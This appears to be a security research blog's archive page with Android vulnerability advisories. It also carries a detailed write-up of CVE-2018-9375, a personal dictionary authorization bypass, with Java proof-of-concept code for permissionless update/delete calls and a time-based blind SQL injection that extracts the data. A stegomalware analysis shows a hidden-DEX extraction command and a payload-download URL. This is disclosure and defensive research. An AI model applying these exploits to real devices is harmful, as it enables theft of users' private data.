ADVISORIES | January 17, 2020

Android (AOSP) Download Provider SQL Injection in Query Sort Parameter (CVE-2019-2196)

A malicious application with the INTERNET permission granted could retrieve all entries from the Download Provider internal database, bypassing all currently implemented access control mechanisms, by exploiting an SQL injection in the sort parameter (ORDER BY clause) and appending a LIMIT clause, which allows expressions, including subqueries.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (which may contain sensitive parameters in the query strings), cookies, custom HTTP headers, etc., for applications such as Gmail, Google Chrome, the Google Play Store, etc.

ADVISORIES |

Android (AOSP) Download Provider SQL Injection in Query Selection Parameter (CVE-2019-2198)

A malicious application with the INTERNET permission granted could retrieve all entries from the Download Provider internal database, bypassing all currently implemented access control mechanisms by exploiting an SQL injection in the selection clause.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (that may contain sensitive parameters in the query strings), cookies, custom HTTP headers, etc., for applications such as Gmail, Google Chrome, the Google Play Store, etc.

ADVISORIES |

Android (AOSP) TV Provider SQL Injection in Query Projection Parameter (CVE-2019-2211)

A malicious application without any granted permission could retrieve all entries from the TV Provider internal database, bypassing all currently implemented access control mechanisms by exploiting an SQL injection in the projection parameter.

The information retrieved from this provider may include personal and potentially sensitive information about other installed applications and user preferences, habits, and activity, such as available channels and programs, watched programs, recorded programs, and titles in the “watch next” list.

RESEARCH | April 25, 2019

Internet of Planes: Hacking Millionaires’ Jet Cabins

The push to incorporate remote management capabilities into products has swept across a number of industries. A good example of this is the famous Internet of Things (IoT), where modern home devices from crockpots to thermostats can be managed remotely from a tablet or smartphone.

One of the biggest problems associated with this new feature is a lack of security. Unfortunately, nobody is surprised when a new, widespread vulnerability appears in the IoT world.

However, the situation becomes a bit more concerning when similar technologies appear in the aviation sector. Nowadays we can find Cabin Management and In-Flight entertainment systems that can be managed from mobile devices owned by crew members and/or passengers.

The systems I’ve analyzed in the research presented here, are deployed in business jets. The discovered vulnerabilities affect passenger and crew devices.

The Cabin Management System is based on a wireless access point installed onboard the aircraft that provides network connectivity from the mobile devices of passengers and crew members to the cabin server. The Android applications (and their iOS equivalents) for both vendors were developed by Rockwell Collins to manage the available cabin capabilities in the aircraft such as cabin temperature, light intensity and much more.

Manufacturer video promo: https://www.youtube.com/watch?v=pRA3AnPU1dE

The Android apps analyzed in this post are:

  1. Venue Cabin Remote by Rockwell Collins – Android Application Version 2.1.12 (Current Version 2.2.2) (https://play.google.com/store/apps/details?id=com.rockwellcollins.venue.cabinremote)
  2. Bombardier Cabin Control – Android Application Version 2.1.12 (Current Version 2.2.1) (https://play.google.com/store/apps/details?id=com.rockwellcollins.venue.cabinremote.bombardier)
Figure 1. Google Play Store: Bombardier Cabin Control Developed by Rockwell Collins
Figure 2. Google Play Store: Venue Cabin Remote developed by Rockwell Collins

The purpose of this post is to:

  • Provide an overview of the operations of these emergent systems, with a focus on the vulnerabilities that affect the Android mobile apps
  • Provide a detailed explanation on how to exploit them

The main vulnerabilities I’ve discovered in the systems are:

  • ZIP Files: Path traversal / Arbitrary File Write
  • Lack of Legitimacy Checking of the Server
    • Rockwell Collins Venue Cabin Remote Version 2.2.2 – Legit Connectivity AP Emulation https://youtu.be/8QRAlTBOatU
    • Unencrypted Communications

Based on the vulnerabilities found during the research, an attacker could create the following situations:

  • Deploy a rogue aircraft access point and write in the devices of the connected clients. This could lead to a full compromise of the device.
  • Deploy a rogue aircraft access point and capture credentials or application secrets used to get access to protected areas in the application managed by the crew members in the real aircraft access point.
  • Connect to a real aircraft access point and interact with the cabin devices using the application. This could lead to full access to the cabin capabilities via the application if the attacker gets the password to access protected application menus and create situations of discomfort onboard an aircraft by altering the temperature to a higher or lower value or modifying light intensity, switching off or blinking.
  • Connect to a real aircraft access point and multicast other server configuration to force the devices that are connected to the network to get a new configuration file, this could lead to some dangerous situations like:
    • A full compromise of the client’s devices connected to the network.
    • Create situations of discomfort onboard an aircraft by altering the temperature to a higher or lower value or modifying light intensity, switching off or blinking.

Research Timeline:

  • 2018 February: IOActive discovers vulnerability
  • 2018 February: IOActive notifies vendor
  • 2019 April: IOActive advisory published

Dani Martinez – @dan1t0 (https://twitter.com/dan1t0)
Security Consultant

The complete research, including: full systems overview and analysis, vulnerability discoveries with the Android apps, and detailed exploit scenarios, can be found on the Technical Advisory Paper.

ADVISORIES | August 2, 2018

Android (AOSP) User Dictionary Content Provider Authorization Bypass

Android Open Source Project (AOSP) vulnerability discovered, where a malicious application without any permission could exploit access to the user personal dictionary.

RESEARCH |

Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375)

I was auditing an Android smartphone, and all installed applications were in scope. My preferred approach, when time permits, is to manually inspect as much code as I can. This is how I found a subtle vulnerability that allowed me to interact with a content provider that was supposed to be protected in recent versions of Android: the user’s personal dictionary, which stores the spelling for non-standard words that the user wants to keep.

While in theory access to the user’s personal dictionary should be only granted to privileged accounts, authorized Input Method Editors (IMEs), and spell checkers, there was a way to bypass some of these restrictions, allowing a malicious application to update, delete, or even retrieve all the dictionary’s contents without requiring any permission or user interaction.

This moderate-risk vulnerability, classified as elevation of privilege and fixed on June 2018, affects the following versions of Android: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

User’s Personal Dictionary
Android provides a custom dictionary that can be customized manually or automatically, learning from the user’s typing. This dictionary can be usually accessed from “Settings → Language & keyboard → Personal dictionary” (sometimes under “Advanced” or slightly different options). It may contain sensitive information, such as names, addresses, phone numbers, emails, passwords, commercial brands, unusual words (may include illnesses, medicines, technical jargon, etc.), or even credit card numbers.

android custom personal dictionary

A user can also define a shortcut for each word or sentence, so instead of typing your full home address, you can add an entry and simply write the associated shortcut (e.g. “myhome”) for its autocompletion.

defining personal dictionary shortcut

Internally, the words are stored in a SQLite database which simply contains a table named “words” (apart from the “android_metadata”). This table’s structure has six columns:

  • _id (INTEGER, PRIMARY KEY)
  • word (TEXT)
  • frequency (INTEGER)
  • locale (TEXT)
  • appid (INTEGER)
  • shortcut (TEXT)

Our main interest will be focused on the “word” column, as it contains the custom words, as its name suggests; however, all remaining columns and tables in the same database would be accessible as well.

Technical Details of the Vulnerability
In older versions of Android, read and write access to the personal dictionary was protected by the following permissions, respectively:

  • android.permission.READ_USER_DICTIONARY
  • android.permission.WRITE_USER_DICTIONARY

This is no longer true for newer versions. According to the official documentation1: “Starting on API 23, the user dictionary is only accessible through IME and spellchecker”. The previous permissions were replaced by internal checks so, theoretically, only privileged accounts (such as root and system), the enabled IMEs, and spell checkers could access the personal dictionary content provider (content://user_dictionary/words).

We can check the AOSP code repository and see how in one the changes2, a new private function named canCallerAccessUserDictionary was introduced and was invoked from all the standard query, insert, update, and delete functions in the UserDictionary content provider to prevent unauthorized calls to these functions.

While the change seems to be effective for both query and insert functions, the authorization check happens too late in update and delete, introducing a security vulnerability that allows any application to successfully invoke the affected functions via the exposed content provider, therefore bypassing the misplaced authorization check.

In the following code for the UserDictionaryProvider class3, pay attention to the highlighted fragments and see how the authorization checks are performed after the database would be already altered:

@Override

public int delete(Uri uri, String where, String[] whereArgs) {
   SQLiteDatabase db = mOpenHelper.getWritableDatabase();
   int count;
   switch (sUriMatcher.match(uri)) {
      case WORDS:
          count = db.delete(USERDICT_TABLE_NAME, where, whereArgs);
          break;
 
      case WORD_ID:
          String wordId = uri.getPathSegments().get(1);
          count = db.delete(USERDICT_TABLE_NAME, Words._ID + "=" + wordId
               + (!TextUtils.isEmpty(where) ? " AND (" + where + ')' : ""), whereArgs);
          break;
 
       default:
          throw new IllegalArgumentException("Unknown URI " + uri);
   }
 
   // Only the enabled IMEs and spell checkers can access this provider.
   if (!canCallerAccessUserDictionary()) {
       return 0;
   }

   getContext().getContentResolver().notifyChange(uri, null);
   mBackupManager.dataChanged();
   return count;
}


@Override

public int update(Uri uri, ContentValues values, String where, String[] whereArgs) {
   SQLiteDatabase db = mOpenHelper.getWritableDatabase();
   int count;
   switch (sUriMatcher.match(uri)) {
      case WORDS:
         count = db.update(USERDICT_TABLE_NAME, values, where, whereArgs);
         break;

      case WORD_ID:
         String wordId = uri.getPathSegments().get(1);
         count = db.update(USERDICT_TABLE_NAME, values, Words._ID + "=" + wordId
+ (!TextUtils.isEmpty(where) ? " AND (" + where + ')' : ""), whereArgs);
         break;

      default:
         throw new IllegalArgumentException("Unknown URI " + uri);
   }

   // Only the enabled IMEs and spell checkers can access this provider.
   if (!canCallerAccessUserDictionary()) {
      return 0;
   }

   getContext().getContentResolver().notifyChange(uri, null);
   mBackupManager.dataChanged();
   return count;
}

Finally, notice how the AndroidManifest.xml file does not provide any additional protection (e.g. intent filters or permissions) to the explicitly exported content provider:

<manifest xmlns:android="http://schemas.android.com/apk/res/android"
       package="com.android.providers.userdictionary"
       android:sharedUserId="android.uid.shared">

   <application android:process="android.process.acore"
       android:label="@string/app_label"
       android:allowClearUserData="false"
       android:backupAgent="DictionaryBackupAgent"
       android:killAfterRestore="false"
       android:usesCleartextTraffic="false"
       >

       <provider android:name="UserDictionaryProvider"
          android:authorities="user_dictionary"
          android:syncable="false"
          android:multiprocess="false"
          android:exported="true" />

   </application>
</manifest>

It is trivial for an attacker to update the content of the user dictionary by invoking code like the following from any malicious application, without the need to ask for any permission:

ContentValues values = new ContentValues();
values.put(UserDictionary.Words.WORD, "IOActive");

getContentResolver().update(UserDictionary.Words.CONTENT_URI, values,
        null, null);

It would be also trivial to delete any content, including the entire personal dictionary:

getContentResolver().delete(UserDictionary.Words.CONTENT_URI, null, null);

Both methods (update and delete) are supposed to return the number of affected rows, but in this case (for non-legitimate invocations) they will always return zero, making it slightly more difficult for an attacker to extract or infer any information from the content provider.

At this point, it may appear that this is all we can do from an attacker perspective. While deleting or updating arbitrary entries could be a nuisance for the end user, the most interesting part is accessing personal data.

Even if the query function is not directly affected by this vulnerability, it is still possible to dump the entire contents by exploiting a time-based, side-channel attack. Since the where argument is fully controllable by the attacker, and due to the fact that a successful update of any row takes more time to execute than the same statement when it does not affect any row, the attack described below was proven to be effective.

Simple Proof of Concept
Consider the following code fragment running locally from a malicious application:

ContentValues values = new ContentValues();
values.put(UserDictionary.Words._ID, 1);

long t0 = System.nanoTime();
for (int i=0; i<200; i++) {
    getContentResolver().update(UserDictionary.Words.CONTENT_URI, values,
                    "_id = 1 AND word LIKE 'a%'", null);
}
long t1 = System.nanoTime();

Invoking the very same statement enough times (e.g. 200 times, depending on the device), the time difference (t1-t0) between an SQL condition that evaluates to “true” and the ones that evaluate to “false” will be noticeable, allowing the attacker to extract all the information in the affected database by exploiting a classic time-based, Boolean blind SQL injection attack.

Therefore, if the first user-defined word in the dictionary starts with the letter “a”, the condition will be evaluated to “true” and the code fragment above will take more time to execute (for example, say 5 seconds), compared to the lesser time required when the guess is false (e.g. 2 seconds), since no row will actually be updated in that case. If the guess was wrong, we can then try with “b”, “c”, and so on. If the guess is correct, it means that we know the first character of the word, so we can proceed with the second character using the same technique. Then, we can move forward to the next word and so on until we dump the entire dictionary or any filterable subset of rows and fields.

To avoid altering the database contents, notice how we updated the “_id” column of the retrieved word to match its original value, so the inner idempotent statement will look like the following:

UPDATE words SET _id=N WHERE _id=N AND (condition)

If the condition is true, the row with identifier “N” will be updated in a way that doesn’t actually change its identifier, since it will be set to its original value, leaving the row unmodified. This is a non-intrusive way to extract data using the execution time as a side-channel oracle.

Because we can replace the condition above with any sub-select statement, this attack can be extended to query any SQL expression supported in SQLite, such as:

  • Is the word ‘something’ stored in the dictionary?
  • Retrieve all 16-character words (e.g. credit card numbers)
  • Retrieve all words that have a shortcut
  • Retrieve all words that contain a dot

Real-world Exploitation
The process described above can be fully automated and optimized. I developed a simple Android application to prove its exploitability and test its effectiveness.

The proof-of-concept (PoC) application is based on the assumption that we can blindly update arbitrary rows in the UserDictionary database through the aforementioned content provider. If the inner UPDATE statement affects one or more rows, it will take more time to execute. This is essentially all that we will need in order to infer whether an assumption, in the form of a SQL condition, is evaluated to true or false.

However, since at this initial point we don’t have any information about the content (not even the values of the internal identifiers), instead of iterating through all possible identifier values, we’ll start with the row with the lowest identifier and smash the original value of its “frequency” field to an arbitrary number. This step could be done using different valid approaches.

Because several shared processes will be running at the same time in Android, the total elapsed time for the same invocation will vary between different executions. Also, this execution time will depend on each device’s processing capabilities and performance; however, from a statistical perspective, repeating the same invocation a significant amount of iterations should give us a differentiable measure on average. That’s why we’ll need to adjust the number of iterations per device and current configuration (e.g. while in battery saving mode).

Although I tried with a more complex approach first to determine if a response time should be interpreted as true or false, I ended up implementing a much simpler approach that led to accurate and reliable results. Just repeat the same number of requests that always evaluate to “true” (e.g. “WHERE 1=1”) and “false” (e.g. “WHERE 1=0”) and take the average time as the threshold to differentiate them. Measured times greater than the threshold will be interpreted as true; otherwise, as false. It’s not AI or big data, nor does it use blockchain or the cloud, but the K.I.S.S. principle applies and works!

differentiate the correct and wrong assumptions

Once we have a way to differentiate between correct and wrong assumptions, it becomes trivial to dump the entire database. The example described in the previous section is easy to understand, but it isn’t the most efficient way to extract information in general. In our PoC, we’ll use the binary search algorithm4 instead for any numeric query, using the following simple approach:

  • Determine the number of rows of the table (optional)
    • SELECT COUNT(*) FROM words
  • Determine the lowest identifier
    • SELECT MIN(_id) FROM words
  • Determine the number of characters of the word with that identifier
    • SELECT length(word) FROM words WHERE _id=N
  • Iterate through that word, extracting character by character (in ASCII/Unicode)
    • SELECT unicode(substr(word, i, 1)) FROM words WHERE _id=N
  • Determine the lowest identifier which is greater than the one we got and repeat
    • SELECT MIN(_id) FROM words WHERE _id > N

Remember that we can’t retrieve any numeric or string value directly, so we’ll need to translate these expressions into a set of Boolean queries that we can evaluate to true or false, based on their execution time. This is how the binary search algorithm works. Instead of querying for a number directly, we’ll query: “is it greater than X?” repeatedly, adjusting the value of X in each iteration until we find the correct value after log(n) queries. For instance, if the current value to retrieve is 97, an execution trace of the algorithm will look like the following:

Iteration Condition Result Max Min Mid
255 0 127
1 Is N > 127? No 127 0 63
2 Is N > 63? Yes 127 63 95
3 Is N > 95? Yes 127 95 111
4 Is N > 111? No 111 95 103
5 Is N > 103? No 103 95 99
6 Is N > 99? No 99 95 97
7 Is N > 97? No 97 95 96
8 Is N > 96? Yes 97 96 96

 

The Proof-of-Concept Exploitation Tool
The process described above was implemented in a PoC tool, shown below. The source code and compiled APK for this PoC can be accessed from the following GitHub repository: https://github.com/IOActive/AOSP-ExploitUserDictionary

Let’s have a look at its minimalistic user interface and explain its singularities.

proof of concept exploitation tool

The first thing the application does is attempt to access the personal dictionary content provider directly, querying the number of entries. Under normal circumstances (not running as root, etc.), we should not have access. If for any reason we achieve direct access, it doesn’t make sense to exploit anything using a time-based, blind approach, but even in that case, you’ll be welcome to waste your CPU cycles with this PoC instead of mining cryptocurrencies.

As described before, there are only two parameters to adjust:

  • Initial number of iterations: How many times will the same call be repeated to get a significant time difference.
  • Minimum time threshold (in milliseconds): How much time will be considered the lowest acceptable value.

Although the current version of the tool will adjust them automatically for us, in the very first stage everything was manual and the tool was simply taking these parameters as they were provided, so this is one of the reasons why these controls exist.

In theory, the larger these numbers are, the better accuracy we’ll get, but the extraction will be slower. If they are smaller, it will run faster, but it’s more likely to obtain inaccurate results. This is why there is a hardcoded minimum of 10 iterations and 200 milliseconds.

If we press the “START” button, the application will start the auto-adjustment of the parameters. First, it will run some queries and discard the results, as the initial ones were usually quite high and not representative. Then, it will execute the initial number of iterations and estimate the corresponding threshold. If the obtained threshold is above the minimum we configured, then it will test the estimated accuracy by running 20 consecutive queries, alternating true and false statements. If the accuracy is not good enough (only one mistake will be allowed), then it will increase the number of iterations and repeat the process a set number of times until the parameters are properly adjusted or give up and exit if the conditions couldn’t be satisfied.

Once the process is started, some controls will be disabled, and we’ll see the current verbose output in the scrollable log window below (also via logcat) where we can see, among other messages, the current row identifier, all SQL subqueries, the total time, and the inferred trueness. The retrieved characters will appear in the upper line as soon as they’re extracted.

verbise output of scrollable log window

Finally, the “UPD” and “DEL” buttons on the right are completely unrelated to the time-based extraction controls, and they simply implement direct calls to the content provider to perform an UPDATE and DELETE, respectively. They were intentionally limited to affect the words starting with “123” only. This was done to avoid accidental deletions of any personal dictionary, so in order to test these methods, we’ll need to add this entry manually, unless we had it already.

Demo
Probably the easiest way to summarize the process is watching the tool in action in the following videos, recorded in a real device.

Additional Considerations
There is usually a gap between theory and practice, so I’d also like to share some of the issues I faced during the design and development of this PoC. First, bear in mind that the tool is simply a quick and dirty PoC. Its main goal was to prove that the exploitation was possible and straightforward to implement, and that’s why it has several limitations and doesn’t follow many of the recommended programming best practices, as it’s not meant to be maintainable, efficient, offer a good user experience, etc.

In the initial stages, I didn’t care about the UI and everything was dumped to the Android log output. When I decided to show the results in the GUI as well, I had to run all the code in a separate thread to avoid blocking the UI thread (which may cause the app to be considered unresponsive and therefore killed by the OS). The accuracy dropped considerably with this simple change, because that thread didn’t have much priority, so I set it to “-20”, which is the maximum allowed priority, and everything worked fine again.

Updating the UI from a separate thread may lead to crashes and it’s generally detected and restricted via runtime exceptions, so in order to show the log messages, I had to invoke them using calls to runOnUiThread. Bear in mind that in a real exploit, there’s no need for a UI at all.

If the personal dictionary is empty, we can’t use any row to force an update, and therefore all queries will take more or less the same time to execute. In this case there’ll be nothing to extract and the tool shouldn’t be able to adjust the parameters and will eventually stop. In some odd cases, it might be randomly calibrated even with an empty database and it will try to extract garbage or pseudo-random data.

In a regular smartphone, the OS will go to sleep mode after a while and the performance will drop considerably, causing the execution time to increase way above the expected values, so all calls would be evaluated as true. This could have been detected and reacted in a different manner, but I simply opted for a simpler solution: I kept the screen turned on and acquired a wake lock via the power manager to prevent the OS from suspending the app. I didn’t bother to release it afterwards, so you’ll have to kill the application if you’re not using it.

Rotating the screen also caused problems, so I forced it to landscape mode only to avoid auto-rotating and to take advantage of the extra width to show each message in a single line.

Once you press the “START” button, some controls will be permanently disabled. If you want to readjust the parameters or run it multiple times, you’ll need to close it and reopen it.

Some external events and executions in parallel (e.g. synchronizing the email, or receiving a push message) may interfere with the application’s behavior, potentially leading to inaccurate results. If that happens, try it again in more stable conditions, such as disabling access to the network or closing all other applications.

The UI doesn’t support internationalization, and it wasn’t designed to extract words in Unicode (although it should be trivial to adapt, it wasn’t my goal for a simple PoC).

It was intentionally limited to extract the first 5 words only, sorted by their internal identifiers.

Remediation
From a source code perspective, the fix is very simple. Just moving the call to check if the caller has permissions to the beginning of the affected functions should be enough to fix the issue. Along with the advisory, we provided Google a patch file with the suggested fix and this was the commit in which they fixed the vulnerability:
https://android.googlesource.com/platform/packages/…

Since the issue has been fixed in the official repository, as end users, we’ll have to make sure that our current installed security patch level contains the patch for CVE-2018-9375. For instance, in Google Pixel/Nexus, it was released on June 2018:
https://source.android.com/security/bulletin/pixel/2018-06-01

If for any reason it’s not possible to apply an update to your device, consider reviewing the contents of your personal dictionary and make sure it doesn’t contain any sensitive information in the unlikely event the issue becomes actively exploited.

Conclusions
Software development is hard. A single misplaced line may lead to undesirable results. A change that was meant to improve the security and protection of the user’s personal dictionary, making it less accessible, led to the opposite outcome, as it inadvertently allowed access without requiring any specific permission and went unnoticed for almost three years.

Identifying a vulnerability like the one described here can be as easy as reading and understanding the source code, just following the execution flow. Automated tests may help detect this kind of issue at an early stage and prevent them from happening again in further changes, but they aren’t always that easy to implement and maintain.

We also learned how to get the most from a vulnerability that, in principle, only allowed us to destroy or tamper with data blindly, increasing its final impact to an information disclosure that leaked all the data by exploiting a side-channel, time-based attack.

Always think outside the box, and remember: time is one of the most valuable resources. Every nanosecond counts!

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical/physical medium (format files, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic algorithms (detection) has been growing. You can see the growth in scientific publications (source: Scholar Google) and research investment by governments or institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion on the possibility of terrorists using this technology. See:
 
 
 
 
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android / tr DroidCoupon.A – 2011, Android / tr SmsZombie.A – 2012, Android / tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – BlackHat Europe October2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
To do this, I will use two known steganographic techniques: adding information to the end of file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
      
 
          PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Loot at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using Openstego (key=alfonso)
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous proofs, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (covert channel using the Google Play). The main question is whether an attacker could use information masked for some evil purpose. Perhaps they could use images to encode executable code that “will exploit” when you are visiting the web (using for example polyglots + stego exploits) or another idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded toGoogle Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information. For example, machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information on those resources?
 
An attacker might want to conceal malicious code on these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).
 
The app verifies the phone number, and after a few clicks in a specific screen on a mobile phone, checks if the number is equal to that stored in the picture. If the numbers match, you can start leaking information (depending on the permissions allowed in the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing it, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). This PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running, and the user performs a series of actions, the image recovers the “new” DEX file. This code runs and connects to a URL with a payload (in this case harmless). The “bad” behavior of this application can only be detected if we analyze the resources of the app in detail or simulate the interaction the app used for triggering the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1: Download the APK to our local store. This requires a tool, such as an APK downloader extension or a specific web as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimageresdrawable-hdpilikeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is inoffensive.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
 
The code that runs the payload:
 
Is Google detecting these “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2.  Analyzing the current and previous version of this app, I discover connections to specific URLs (images files). Are these truly images? Not all.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:

Step 4. If we analyze these databases, it is possible to find curious messages. For example, recipes with drugs.

Is Google aware of the information exchanged using their applications? This example does not cease to be a mere curiosity, but such procedures might violate the policy of publication of certain applications on the market or more serious things.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information on Google Play and Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on a previous research by the author at ElevenPaths